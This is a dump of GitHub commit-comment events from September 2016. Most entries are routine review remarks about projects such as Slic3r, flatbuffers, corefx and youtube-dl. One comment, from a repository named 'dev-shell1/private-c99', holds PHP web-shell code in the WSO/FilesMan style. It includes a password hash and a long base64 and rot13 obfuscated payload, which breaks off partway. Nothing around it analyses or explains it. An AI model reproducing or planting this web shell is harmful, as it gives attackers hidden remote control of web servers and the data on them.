{"id":"4557619352","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19007027,"position":null,"line":20,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b6a5940555728865bb8ea9faa19e9552480bf61c","created_at":"2016-09-13T19:05:11Z","updated_at":"2016-09-13T19:05:11Z","body":"Hello, world!"}},"created_at":"2016-09-13T19:05:11Z"}
{"id":"4557621269","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19007032,"position":30,"line":247,"path":"xs/src/libslic3r/ExtrusionEntity.cpp","commit_id":"c443f49da3e968841f43dc1f51aae189239c12d3","created_at":"2016-09-13T19:05:31Z","updated_at":"2016-09-13T19:05:31Z","body":"So this catches an edge case where a path that is fixable after a split isn't dropped?"}},"created_at":"2016-09-13T19:05:31Z"}
{"id":"4557621735","type":"CommitCommentEvent","actor":{"login":"kristrev"},"repo":{"name":"MONROE-PROJECT/Utilities"},"payload":{"comment":{"id":19007034,"position":null,"line":null,"path":null,"commit_id":"2d36d75095407461d9b38f7d55565b0727b2f80a","created_at":"2016-09-13T19:05:36Z","updated_at":"2016-09-13T19:05:36Z","body":"You might want to set -i usb+ in the firewall rule, just to limit a bit.\r\n\r\nThough, this change does not have large security implications and is just a v1 (before anyone comments on it). In the final version, we will dynamically update the firewall rules based on the IP of the device (filter on -s)."}},"created_at":"2016-09-13T19:05:36Z"}
{"id":"4557622661","type":"CommitCommentEvent","actor":{"login":"arhq315"},"repo":{"name":"VisionWebSoft/tlr"},"payload":{"comment":{"id":19007040,"position":null,"line":null,"path":null,"commit_id":"756edad688c92f19bc1fb65e30cdab257cc68f36","created_at":"2016-09-13T19:05:46Z","updated_at":"2016-09-13T19:05:46Z","body":"Added a word modal demo that uses the wordModal module to create a bullet point list of the user's order in realtime, by using the user's input. The code filters out symbols and numbers and breaks the input up by spaces to display each word the customer will  order. It also calculates the total price of the order based on the price in the wordModal config object. \r\n\r\nThe file also contains a to do list since the module needs some configuring before it will work. It does not work out of the box as the implementation options would have been rather limited. Instead, it has been left configurable and flexible."}},"created_at":"2016-09-13T19:05:46Z"}
{"id":"4557628395","type":"CommitCommentEvent","actor":{"login":"TGIshib"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":19007054,"position":null,"line":null,"path":null,"commit_id":"9f16090f901c30f872422f60db21a0370dde8bbf","created_at":"2016-09-13T19:06:49Z","updated_at":"2016-09-13T19:06:49Z","body":"Hello,\r\n`field(String key)` will work correctly only when our vector of `Objects` will be a field of `Object`, because in the other cases there will be another constant at `__offset(6)`. I don't see how we can make it work without knowing `vectorOffset`. Not sure that it is a good idea, but maybe we could store an offset of the key field somewhere?"}},"created_at":"2016-09-13T19:06:49Z"}
{"id":"4557628720","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":19007058,"position":null,"line":null,"path":null,"commit_id":"7e6d1a5033885491d33de30c496b2e0fc6d4a1d4","created_at":"2016-09-13T19:06:53Z","updated_at":"2016-09-13T19:06:53Z","body":"Thanks! :)"}},"created_at":"2016-09-13T19:06:53Z"}
{"id":"4557628868","type":"CommitCommentEvent","actor":{"login":"razvan-tudosa"},"repo":{"name":"GardenerJazz/2016"},"payload":{"comment":{"id":19007060,"position":null,"line":null,"path":null,"commit_id":"0284511ba106db9359d63642e20b519f58c227fe","created_at":"2016-09-13T19:06:55Z","updated_at":"2016-09-13T19:06:55Z","body":"![crazy-bear](https://cdn.meme.am/instances/500x/71690902.jpg)"}},"created_at":"2016-09-13T19:06:55Z"}
{"id":"4557630101","type":"CommitCommentEvent","actor":{"login":"RadekSowa"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":19007065,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-13T19:07:10Z","updated_at":"2016-09-13T19:07:10Z","body":"bruh :trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface:"}},"created_at":"2016-09-13T19:07:10Z"}
{"id":"4557635760","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19007078,"position":null,"line":null,"path":null,"commit_id":"1ce4902684a75d7fb6be951bd91a56a30797c6a6","created_at":"2016-09-13T19:08:13Z","updated_at":"2016-09-13T19:08:13Z","body":"Ah nice catch. I ran into something similar in an earlier commit. I found `ev.target.classList.contains(\"priority\")` was really useful."}},"created_at":"2016-09-13T19:08:13Z"}
{"id":"4557636836","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007083,"position":226,"line":2156,"path":"pkg/Microsoft.Private.PackageBaseline/packageIndex.json","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:08:20Z","updated_at":"2016-09-13T19:08:20Z","body":"So long as package build isn't complaining you don't need to do that.  I'd prefer to add it once I'm able to fix the buildtools to catch it."}},"created_at":"2016-09-13T19:08:20Z"}
{"id":"4557638442","type":"CommitCommentEvent","actor":{"login":"Brummolix"},"repo":{"name":"Brummolix/AutoarchiveReloaded"},"payload":{"comment":{"id":19007086,"position":null,"line":null,"path":null,"commit_id":"6f7adb34966fbdf35fea3b8dc384e8159d5fd583","created_at":"2016-09-13T19:08:42Z","updated_at":"2016-09-13T19:08:42Z","body":"#19 was the right issue instead of #18 :("}},"created_at":"2016-09-13T19:08:42Z"}
{"id":"4557639496","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19007089,"position":7,"line":356,"path":"youtube_dl/options.py","commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-13T19:08:53Z","updated_at":"2016-09-13T19:08:53Z","body":"Option for printing TV providers (I suppose you mean list of mso ids?) may be useful if identifiers are not stable across different content providers. Is that the case? Regarding option group for adobe pass - it's up to you. In any case even if not introducing it now we can move ap options in separate group just any time later."}},"created_at":"2016-09-13T19:08:53Z"}
{"id":"4557648126","type":"CommitCommentEvent","actor":{"login":"barischj"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":19007101,"position":null,"line":null,"path":null,"commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-13T19:10:28Z","updated_at":"2016-09-13T19:10:28Z","body":"test"}},"created_at":"2016-09-13T19:10:28Z"}
{"id":"4557649745","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19007107,"position":23,"line":244,"path":"xs/src/libslic3r/ExtrusionEntity.cpp","commit_id":"c443f49da3e968841f43dc1f51aae189239c12d3","created_at":"2016-09-13T19:10:46Z","updated_at":"2016-09-13T19:10:46Z","body":"So, what was the problem with using the copy constructor here? "}},"created_at":"2016-09-13T19:10:46Z"}
{"id":"4557651045","type":"CommitCommentEvent","actor":{"login":"shell-123001"},"repo":{"name":"dev-shell1/private-c99"},"payload":{"comment":{"id":19007113,"position":null,"line":null,"path":null,"commit_id":"0102316ef24dae1694aca3af9df6054fdbfb686f","created_at":"2016-09-13T19:11:00Z","updated_at":"2016-09-13T19:11:00Z","body":"<?php\r\n//\r\n$auth_pass = \"6a7a0ae3f3330bfb15a9a467090e808f\"; //password = ****\r\n$color = \"#df5\";\r\n$default_action = 'FilesMan';\r\n$default_use_ajax = true;\r\n$default_charset = 'Windows-1251';\r\n$x0b=__FILE__\r\n;$_X='Pz48PyA1djFsKGd6NG5mbDF0NShzdHJfcjJ0Nm8oYjFzNWV1X2Q1YzJkNSgnRkpvRmpzTmMzbEpmcFh\r\nUOVdCZVlWbmZkbHBraXhsYkx6TXhzK3AzMUZxVDR1L1B0dlVuRlpQNzdmLy9pNzcvS0t4bytxYi90UndvcFJQ\r\nZXpIOXYvdHZtQTBYK3laeThKN0g5U21jOVMrYysvVWhXVnU3OGZIa2RqQzVHWisxU3hBUEtvdnJUZEtLWFRyY\r\njc4ZFl5WFFmYmR6YjVJSDY1blg1YnhzSCsvSkFxQ0ZBQ0NnK3dRMkpDQ3BKK2JVVUFDUFJGeHdjNERvdkxCSS\r\n9VRGdoMnd6b0N3VitaSnNnRGo0WjY3OWVTWjdvbHFlUXhCWUNJdXZ1UTlGeXYwRm5GdWxtREZ3ME9UQUo5SmZ\r\nnd3pGTFFQS0M5TFpUTmNPeXZ0Y3N2TXdiVXhKTXlLalhsdnhVN2kyYm5SekI4dnNkSWRzeERyV2hZU01ZanZ0\r\nSitNT0krZmVsNFZ4bEpSNGlaZVZ3YndmQlYvZlBrYmZKVllKVHFTbU1mK0V6ZTJ2ZFgwSjBrUm5DVDV1RUY1b\r\n0FCeXk4Zks2OEcwTTg0ajVCWE93OEVnaE5ITGNLeXlRdWdpK0RqNnhtakltMmxhU1piZGRFTXBCK0JERU1NOW\r\nJBV0daRzUvSVpha0dqUURZTzJOaXlCTWQwdDBGcllWMFBhVjJDWCt3dDdaTDJRQUZ3TkI0V2JucFdoSFE2eG1\r\nnU0xRTm5zQmRSRFRHdTlySVJxZytFQlA1NkZGNzBSTHdaMTRXTlF5aEZCdUVGcEozNkNPZmJaeDJHN3ZrMTNF\r\neUxXWlNPUzdzMEcxamNtWHJNcUhJaUI5N0xFZG9nK0RSQWJ1T2FCU2Z5MnMrMlFyRk5YWk5YYzR5RzkreDBVQ\r\nUFvU2lkUUFzNGF5bSsrQ3NNd2VORWNxN0s5WWVHdkZBOGpSNkgxN3JxRkNsZzZJMzZmTU0xUU9jQmtRQnZ6bn\r\nBvcDBLTE9WanQ1YnlxcUlyV3NFV2FWeVB1OFh3OVJEVW9wRnQ0SjhXMzg2NmFydzUvMGN0SkYxZmFjUmF3RFR\r\nwV0p5OTdMUjRlUlJOMTNWbEJSR1VVTCtiOW1oK28vV3RhMnpKQU1Vbjdqd0duZ1R3UzFVS1RxZlNJN1gwb2Jp\r\nMzZiNkxzQk91RjdZY1VyRjFGMHI1a0dRL0lsRFVDMlp5TDByczAwWU80UHhTTHkrRTdkNE11M1p3enVvcU9jS\r\nHdiRFJ5MG5wYWFkVGoyVDJpVng2OU15SG41SlVqNUtOelQzbGZUbitVRmw1d0VLRzhKeDZSOGNpV0tuWENWej\r\nYxcmxPbnI1RWtHWEh4bHFRMUl6SUgxQzlCYXBWQXk4dHFucUVzVEprK2tKc2c5eXFlSTE5OXFiWmlud2pCV2t\r\nTenI1dHJQdk52K1h4RlJyVU1rcjBGVlFqTnN2YWxmZXlvTlVvYjhIMXBoVWVWdVVDdllLOVhoamlZSFNqY3Zn\r\nUXlmbUpyeWxoblZHa1BsOVh6c3UxSmJHNktsWEtVQVFEazRSL1JIc093Z3RUTDVpZk52dFlCNXRxOWZ3eUFWb\r\nS9jTWdXRWhIS3ROVXh1NjYzOElET2Z1RUFPQnlvS2pLRTliY0pYbVlvNW9zVzUra05EazNiRDBGQXNJdHlPd2\r\nVrUjJ1SWQzTFNYWU1wa3o1bjV5Z1lHeFNWRVhmejBjc0tyTm9VMDdwZFp5Z2M3K1ZPb1JUT3U4NGdHcUt6VGV\r\nUSVNCazZqdEc3Mk81MitiOWh1Z0Z3a0pmYlczZUVPcUZrWTc1TEJqQ05DRjNOam8zeHBNN2ZvMVhQRG5LUnJS\r\naTljaG4xb3JEeDlXTjM0bE1vWWlJditMcHN1TzVvMTRrUmdIMWpLVnFoV1p5bnRlWHY2c0JXejdNS1FyL2Jlb\r\nk11NDZhV1Rmc2hnZnBmMlllaE50ZXpOZGx5V2RWTThqUFpDbGlia0dzSnZnR0hWTTJJaFk3S1hyQmdyM3ovUj\r\nY5TXMvNm9MOS9jVlFHeHlZNVhtTUM4QVVRd3dXOFpROHlTWDN6TjcvN29LOFBHcnBTMWFvVXNRZjFsbU5jcXU\r\n3K0pGekdKMTBGQjE2RXQrYy91WmtZNlY3N2lxTHFDejFqSVAwMmV0RjI5d3FXSDh1Z1Bza25UQ2ZVV0NQNFk2\r\neGo0cjdHRXpkV3c0QWF3YWFyT1hRUXFJdE9XZXhPUUtYU0lLWlR1K0l3M0ltaTA5Q0p5ZXpaajdzNmt0L3lYe\r\nDAyVzNkZTFhNGp0YTUvbE44ZGh2RTUrSFFrVURYbDNSMEhVTSt1bzNra3JKVjJBdlhZR1MvZjVTS0dadUJXeE\r\nNjdkQzM3BZY1J4b285Z0ZhUk0vQzdpY05QUSt6MW5YRVZPelZzQ0Q1THBSWUdacVh4Uk95RDNNbHdzQzdQNjA\r\nvd1V5ZXRrSVJmMEZObEpvbXhRQy9ha2dEMlE2UTM1bUxKL0RDUlB4YUtqK0lNWjRnbGZpQjdoRWNicHZUT09j\r\naUM0NnpSbGJNZ0xRWFVvbEs2SktFMXArYUwrOVh5WmVSclR6Tk94NzJxbSszSUhmenNwTGdFem1kVTNkQ2FMZ\r\nDlwMDVBVFk3dFhldEIyMzBibjZYOG01aHhGS1NCdFZONG1tK3FPMmRoR2w2S1BBaU1CWlZya0tGVEpSNjE4aG\r\nRsZkxlbjMvTUR1b3hkTVpLUGpQNlJCTE8vNzlBVHlKNUdLOGd1Y3hSQnd6RVNwb1pEa3JJT1hOMTE1dTBJaTh\r\nmWUloTDJYQ2hzUTA1VEhReVVWc2x6ckRzZFRRTGk3UVhDNUtyY3poZFRIQzVtRTBXT2Y2QUIxTUxvWmpLVmlR\r\nc2oyVEdwaTFTZGhLN3ZCMFZ5akZBazZ5WmtzaUZNZzNybjBwcWtMaGtTcnRubnFIbmtSZjlBdXJicldrdms4Y\r\nUdTSlZqVmtSQWFhd1lMWldGWGlEblpWRCt0K2VnOHZsNFFDNE00azVIVnY4QUlORlpFUUxDWjM2V0pEOUJDNU\r\nt4YUU0WXJObHppK0d3UnZBa3N3clJGaVBGejZRS2lDckgxVjVSRm53QlhCUnljU3NUcGdJRHhKYkRmd0lZeFR\r\nPNE8zaWZTL3RvcjNYTGlzTkt4ejRGOEljNzVFRWQ5NFBlcy9OSEF6NlJIemIxRjN2dHF3aGY4Q3FpVGY2K0pT\r\nYnZ2SElyYVQyMlk3YVVmVSt2S2JidmRBUFM5VE9XTURScms3Z1phL2pDQ3N0OFRiYjMvdnZLWkw1UUtsdW43M\r\nGtJZHBZR1V0V2NwUzdpb2pKQ1NNVjM0NU9zSE9XWFRTNU40dVRHaVIwNFNHcDBHMVdEa2JQOVhDR0lGOWNDM2\r\nFCQ0tldmtnRGFUbTJWMkx4OFJYUWJBWmtlVFNyY2xWMDBYOWQ4VzRsZEJKN2lVUUhQclU5ek92R01UeUVYdVp\r\nLcFdxVUxkYnBWN3VQcDVwdFk5MEk5U0VHZW9tdmVqVVFLZGx0aDZOVHFjY3NkNVAwZ1p6WWdOSXJ1c2NYNndk\r\nVWduRitRMU1vWGVIbTNMNEdFZlNQRm1iWU9mOVAzRS81b1RacGVTTktFVHNqVEY3ZWFobEZxNi94RExnaExDd\r\nUNWZFEya0xSOGpQZTVLREJVUWt1d2VnQ0tTcGVDcERnZU5CQlc1SUR2dFF4SjRka3FZWHZrbjIxZkdjMHpsV3\r\nRZY0xySndvNGExSEJybWdYWERBUDNTWjZoWkdDWnFWRHd1Qy9KcHFIc3Z6MWJ1QS94UWZaNmRLNHNXYnFsMm9\r\nMemcyei9PSVk0WmFBRTdjSzBlMGl2NmllcXVncndKcmVnUnY5bUQ3Z1kxbVpwU3lmTURsRGdaWHdEYnhYL3FI\r\naFNtK3pxamZkS21oWk51bloxSHhoODdrQXZSNVNFQm5qbFY0WFJrczdrUzl2VmlpODg0T0N5NG5IV214OXFMZ\r\nDB1MkZaZ3UxNW53a2lvc2RTenptM0x6L3N4WnlDOUgxWnlCM3NYb0VDU3hJbUVSbW91MDZJc3JTZEhoZWZFZm\r\nNwZ0J5RkdoblVMeW9wRnVMS1B1MDFhQVJOSWVVeGI4OWhkaGlZNDkrN0Fhb3NPMlZ4SjhYQ2FqcXZhTFpmQmN\r\nqZUduZjJLaHhOZmo4OVVYLzdDeWlhNTU1a3lzVUVSOTBuOUp2WGFRek9qem5KcWhlaUN2c2JMVURvNk85eW5n\r\nbFZvTEVKS29UQ1p1OHVEZ3ppOFpBZlMwZGliUTQwYVJNRDk4TkFtbEh4SnNtNXhuNVVVTFFpUmxPVnVORktOd\r\nkVwTnNjV2M2L0UwUkp5OFZ2VEprL2xSdkVLWU94VWo3eVVZVGFaYk50WXpjcEhDR0FpYlA1YkNxTlpTam1jNm\r\nRNaEdhNjc5bVpMWGk3R00wUG52L0tGSi8xVGhseUJFU1J4b2xFLzhuYTBRa2JmT0FuWUkxaFdCNVR0RU4zYVl\r\nOdjZwVDFrUmh1bWxLS29lVmF3T0s5Wm5TV285M2JsLzV6MjFUaDk5VlZpQllhajVwVmIvMFA2TEptdko3d0d0\r\ndTJ5UVZjOS9SRTNSakJSWVN3RWh4VXlTZi82YzRyaFhsNW93eG51UDZ0QXQzSk5aeWJsbkdHcEZzank1bTU2Y\r\n2dRbmRmQ2RtMDJKVE5YNW9VVjR3K0RBWmFMSGkxYjNnQ3F5VVpINnF5TzhhYTE5bHVHdHhMSUZqZ0FDRjFGZD\r\nhHWFA1N1RtMEFHVVhqVUp5TFN3LzVZVVhSdXhyV3F4bXRXZEYzOG5TS3FlN3JxdURvWEZRUjhMRjAxZzh3RGR\r\nZT2srQXNlWDE3c2tNamdueUdHZ2xjbkFMSjZEWm9LWmptYzczT0kzYUJpL2tIekFKcG9jbzJkcGhqRmxNdDhK\r\nY0ZOclpKZktDZkFUdStwaXRXQ2E2c2lMZHhqS0JHcU9udEhqZmdKSXpYcjV2emUvQUFXZmxVSWptb29zUHRPV\r\nEZoWDlYRTNXTHoyLzJCOXBGL2VWMmlhV2tWQ09aNUpUTWJ3a2V0VG5WVWlSdDNQR2ZnTWlwN2tvVEhKbmhiSH\r\nlRaWRVbXpkbGwzVG5xZ3ZvTXh2NWsxNk9tOCt0dEN2YUVVMmdwdFo1MW02cTJYdTRqUlExODYzUXZ4TWwxVTZ\r\nXNjVuZWFZUHFlNEhVUmdEcVhTRXV4MTZwTnlCVlhTczdJRllGU0hWVzFOUUl3MWU4ZW4xbmhIV25pbGRBeHAv\r\nMU0xZnAzdE5TZitFb0l0RVl6bHdtazRXNHEvajFoZUM2d2lkVytvcUo5bFFKMlc0NHJMN3pVUkRjNitOa3VqT\r\njhtSVFHMXJlQlhubld3b0JFRFdLRUtiemVoUDVKaXZmd25CZGIzSHJMU3ZtUkQ2M29HOEpXajVuUGFQTGNwRn\r\nZFdHNCSENxOXdVdGVJYlhpNnFhZzZwSG1YRDVjNWJKVDRkVUR1SjkvU1J4NEk2OWxCQ1QxaEl5U3NvZWxKMUt\r\nKUDVJTWtlWXJVa2g5RnJqMmdGeDNWMDJYdkVQUlV5VlRoZnZBMlBDOEpNQW0zYlJvTlNXdFJRMVJPbjZDL1J4\r\nU0NrZ20yNmVmd3pJa3NqNU9xRlVaMG9iSENESk5OMXhiTzBoM1U2Kzk1WHVKWXBld1pVL0tCNWR5cHNXa08zc\r\nS9NdWk0QlhDTkd3bGxpenBlNDhxanlGMERrVUx5UGdzUVVHaWFEUHpLS05TSGlEc0xMb0pnOUFDeXkyaStzM1\r\nkyRGQ4REtyM3d4M1NseDZlL0k3QUNmTVd2UmdSOFJsTGc3UFNqRW1PUklWZFcvOCs4WjZWeHFJdnNNYlQ4S2p\r\n0QTNtbW9YRXBhaklBVC9UTjNKL2RpbEk2NWY5dXNNWFpBVTl4dWkyYmtFUlFTUCtBbEVob29icVpId1A5WDl5\r\nc002R04wcW9wUEQzSTRoVDJLVE9SQ05mNkNDUjJCclFwcnNDK0dLdUF0U1pyMlBWakZuMnlvd1BtWTNVZFplb\r\nG5Ua1ZMYnB5bmhPNjRGVXo4OXVrSm00Z2FOQnZyY2E0bXJFSTViaENQNHc0S2s1TXc0TG1WNEhXQmx1dUtjVE\r\n9ocXcrazQrQ1NKQWE1T3BDV2NKMUI5U1Y5MFQvS01kbnF3R2NoYUhnRUo5Tkkwdk1sUlFSZ0lXMDFKczhsaTg\r\nyVEFHVVRXR2dNSDA1eHJRbWF3WnhqYktGcTdBRDB0RlhKT1BYV0VCd1VTUWhTRkNDTGMrdklsUkRYeUplcVRI\r\nZ0ZLVlFuN1hrbXVkNlJncVFVMERrSUwrKzNhRkhDMEpuTHVtZmF2a2tQdndXTFEwNmZiMnNiOVdJUUJJRXhBS\r\nkV3M3VxUmRhSHEzOHdFMjZ2YkZmYkgzNDJ3Ry9pL3BMOStla1dDUVZjQnFBTFBJcmd0akFBZXV3VmFxMmMzdj\r\nRYeHhrNytFSHZRRUNtdzB5QWhDQXhHbmVHNUZwbzI0NWVEMndWbXljOVM5SUQzeFJzWHlsWGNxZzJLbGEvdmd\r\nqcDFsTDlSaG11ZU9jcjJQTGcrQ05ZMUFtRCtYYUQvY0NWQlJyaGRUa3dEeVNNazluZkpaL1Zra3p1Y04xQjFC\r\nR05GWVJ4dW1Jak56RVpMUE9EVElsemhlYWtpSG1SamZrS3BjRmNqc2lFaHRmMFBmakhpZ3doSFV3aEp3TURCO\r\nXNWQTBHcEtMMFRXVzZ4RXFKUG5RT0FhUjlRZnoxZG02LzVlcjBBMkhEOEx5OE5SWStXSzV2SW9pTC9wVE8zMU\r\n9xV1I2Wk5yVVd5amVYL2dXb1BVZGp1WndYN1V3WDdxMzVtT3Q0VmpLZXh6MCtMRlgwVXhHeE1CMjhCcnd5dEN\r\nsOFFMTXVHelFEYWs0YjdNc1lGUUpHcWdkeDZkWVd5dXhoQ01ReUk1R1h6UERwMURUTG0wd3ErMFpDSHpaT0pV\r\nOFo1Zk5wSm9RT2FiVEk5QjkxQjJTWjhpK2NWaTlLWVMzOGRkMTRJT2NFNUNmWU9SN0FmTCtFUDVRYzZlNDdsW\r\nk1mZkZlN2NjMmtYbGlyaXI1UjhLcEo1NGhZNExaVHNIQTFRTWpSdHdaalhuZlJjMytyUU0xZXN1ZUdpWkFsSD\r\nVDVDJGcjBPOHJ4R01kWDR5QkNpVmpoeStKckZvZWZRaHRvZnIwVjF3Qnd2M0M5YVp6TlJDMllSem82WG44ZVY\r\nxbjRpVGNWUlIyeFErSzhQaHA3UVkyUzkydW9NZGxwd2VRem9mM3VuWE14akZITzQ4ZmFoTVNDdnh0Qit1SURM\r\nSEpDZGhESjkrQXA3aitHRDFBMzZpeldoWERkU3dsNVZXYUhseS85STdCWkE4OGZtQytvRHNDUGZBWkpDUlIzM\r\nHdzS0puKzlrcTZiT2JqUnJsSlduZ0krcnR6czNqWmwwakk2YWpyUFBmYjFMZkdncm5MM2tUSUIzQStVSmJ5M1\r\novQWxrZXBQQi9nY3ZrenRKLzFTR1hjZS9tVXVWai9hYU5ac0tYNXlKdjZWSGdmWmFvdC9KeElqWVFNcW5JbkU\r\nwWS80cWI4VERMNGxqWWc2cGxwV2RkRDdHeFlHUmFISGpQRFl3WlhLZjNzdmFkcFZ2WVRuVHhVVDhCTVc5ZzE0\r\nY1VUYUlsWUtLaEF1Nm9HbndPYmpGWWhic2V4V3lFSldTd3VEb3JlS0lzNERwaWtuL0t3eWVUT1YvcVFObitWe\r\nnc4VXM5NG1YaGpxSys1bFMrK3J6Y3ZySitreXFzUjViZ1hLMDZHWVU0b3hUY2FkWHNGNVAzOVlzYXRxekQyV1\r\nZmRHR3TDZQUUxZK0U3Y2RkZjU3L25NOTF2cG8rTlpkRnRUaUE2NHJTeFFNcUFJMEhIVE91TXBqd3hYZGdjSlF\r\nWT1hTU2NZeXkwbi9rZkF6amRmK2N2eEd0anNzYm1LSHdyVGVDWnFLczFLaEZxcG4xbTY4ZnJsTkphUVUwR1Br\r\nalpOTG4xOEt4dzBkVGVySGdGQ1JtbFFaV0tZa1E1cG9MT3ZyNUpWTDVRTnBHT1hGaXh4M2NUcWVCOVpkRDdzS\r\n1ZEdU9iS3FJZWt1UWxCRXJBOUF6d3pFbm5GWStwa1dlaUd2TFBSZElEWDM1cElsUitxcVkvY2FGRXlpTWNpWD\r\nYwOVd0MnJ3WSt5VzlsZko5VXQwdHQ5QzZrOGNCTVlBL1BRMkRJRFVvSUpSUkIxUDN4UUNHMHh5OVNhd1FYdUt\r\nVUnFpYVJQS2N3cnVJSDNNUVJiUW1HUk1PQWhWU2NJb3Nqd1pJOURLeVNBWUJXOVJJSnBwdzJHN3EwajV4eHdW\r\nOXcwelk1U0REWjh3NHFUL05yc1VxRHdCb3lHeTBENFNlL05BcWNrM2tlMGdMZEZwZ25hSEYyZmpMdVcxMURvN\r\nkExNiszVGdrMjdnNUNIcTF4aUl5L1M2VXNTYkliRk1MQit4Mkc4VUZHK29ZTjVTazduZllSd091cnZvRlIrSz\r\nhYblBJY1RwbE5GdTNqekgybGpxVE01TkhTdmRhOE45YkowZk1Uak9EUkF6U2tYNTh1K3JRQUVnM0xqK2FoRVF\r\nwYjFhOHA2ZGVSYUg0OUlnMGk2SEVkcUpTRnJGMGtrTTB1NU82Q2s2emxGd1RlakN2QzBnWXVJekJYWTM1VHFj\r\nMnB0QkQyTU9PYStoZnUxR2FwTTBRdVFud0ExdUk0c2c4eDZ3NHczdE5NajBKM0QwM2dvNXZYUDNDbUFKdk90Q\r\nzQzZklhSDhXR04ySHdZNEtPVUdDTzBiZjkwK3lQUnBxWW9GVURjeXY2RFVEZTF2ZHJxSG5ROVRpaE1kOWs5Qk\r\nkwRGNpL3dRS1lEL3RxN0orQlArZXVDWTBIUHoyY2J2OE9YVncwKzJEb0o2cCt3L2ZKekR5UmZseGJMaWZ0N08\r\n3QVBoNGxITjFHVWlKNzZEdnNPblkrWU1WUkdMNDFlK0VxYXk2b1pEdzdZcC9tUDhOdXdXV0lNakduSm50aUU1\r\nbnNoMDRUblpLQXR1OHBXcGNxQ3NYcE8zQmU0Y0V0c0xKYmIxcnYvSjRKaUNjOFExUFhRUDlIR1d0cnJCVXJMU\r\n253Y2tIdkhOeHlBMFN6dXAxZFZlZVdWSzdXSnVaeFpWWVREOUZWZmZLQnVnWm9qVzA3bTZlK0ZrdXJ5R0R0TF\r\nV1THA4UnUxWWRyelRGNnE1Z212aHVwL0JjUUF3Ti82ZXUyQzJsWkxEY01kcm1Mbml5KzFMdWIrRXRLM2NOT1c\r\n2aTVBVVNRbUZ2QjFyVTlTZlhLME00MmlqS0NhcVJLVFhLdFowVTJjK3Z0eFoxU2N2c2FYblNRR0djV0FBYUtK\r\nWXMzT3Z2YWFCMlRWb0VXSEZyWFBKNzRXek9zUmlMNHhHT0t1VnY5V05vMjVSOXhNMER3b2EwVFRZcjd1MkpRZ\r\nGg4ZDA2WjNxM2I2L3ptdlpKeE1hVjZIbllXc0ZSdFFsSy9vQU84eGMwN0lVemhkVGx6K0dzTlRCZzI5d2hrR0\r\nx4a1UvS1VxNmFrYXoycGt4TTRIN3dMWGVuVVFaREZjODJrci9BRFZ3WWxpMUFkeGwrclZ5Y0hmdzNzTXR2SEh\r\nUTEN4WlZ5RkN1TEl2eFVRak03YzVXcElhSTVMQXdVajljY3ZmMG9NMWp1Tk92OVkxR2U2Q3ZCb0JsM0pzOUEz\r\nZkRqNjhOZVJPQ2JobUpqVXZSUDgzZ3JXMDc4MXE1VHQ0dGo5Tldzam5jK2k2NkY0RzMzd2d3RFdha004ZzJLS\r\n2VwMmRVRHJ2Y1BGdlgyYlIrbSs1bHVzWmV1amVpUllaeVdMdmgyWTRmb2dWMHFvRTNnR0xvSEljeGdjYWRFVV\r\nJ4dWxxdTFRR2t2ZXlTNk42ekZOQ3hrdjg4U2poVHlQaFE3alRZTnF5YndaZytDVFJMZmgyZzYvWHg2bGpHOHl\r\nNTXZZMXR1aHkza1h5clREeEhPdW93TGl0YlFwamxnd3A2QytCM0FmV3IxUTB5WGtVekRpZytLNnlELytwREc2\r\nSFFYNDltTk5TTWozbjRRUTcrQ0hoaGVXRnNwNE9CNFEzREp6SFBUK3ZlMmxXTEtWRndUYUkwK0ZiZTdGQjNFO\r\nUM1Q01xTlJiYTh6OVZNbFl0cnZEcHNoN0JLQlVvNVkvSUtvUWpPVjJsTCsyY0ZjRENHM2RFakxoYWlGdk9wZT\r\nFzQ1dZKy96NGVzV2cvR0llS0JwUVEzVlhqRXRxQkFOQUo2VUJjYTE0bnB4eDVPZS9Id3pHd3Q4OC8wQnE2ZDR\r\nkMWUrNGhNU1o3aTBaV0FpS21iS3JOZU1YcWdYS21jZHNoYWQ0Sytxb2RCenNzLzdQOElaaW5acjlwK0VzRWhs\r\nZm9RMitPTGpkN0ZSVTEya3NVTzJ4UDgyZ3FQSU00TktVcm50UTdKT0JINjBadDNUZzF5Y3BXZmhlOWU2WHdTa\r\n2FJUG96ZktCQ1FLNERaTFBDamNqekhWbmFsZnBUT2l3NFZHTlI3M1hoelBYbHpQU214Zi9sWVhrVFJiRGgydF\r\nhQTE5mZkU3OVI2b3NTbG5VWjIreGtVZHJ2dGJDSWxTWmpTTld3dmJxOG14Z095eURSNE5kbmZpMis0QTR4VFd\r\nLd2N0a3ZrTFpVZ1pWQ2lkcGg4cnFhUy93UFJSUW9za01qY3RQRTBoTE1FcHdvUEVvRGVZSGhvT0ozdDNsd2tK\r\nb1ZXNyttQXM1WVM3ZnZVQUNDTlU3MkRLK2tQSkZmNmJjRy9idFU3enRPRkRHSFFCZ2MvVTEvZGxxSjFVMHlFa\r\nm9uT1RhV0w2TVR5ZVQwWjIwY0RPcWdBQlYrSlZXYjI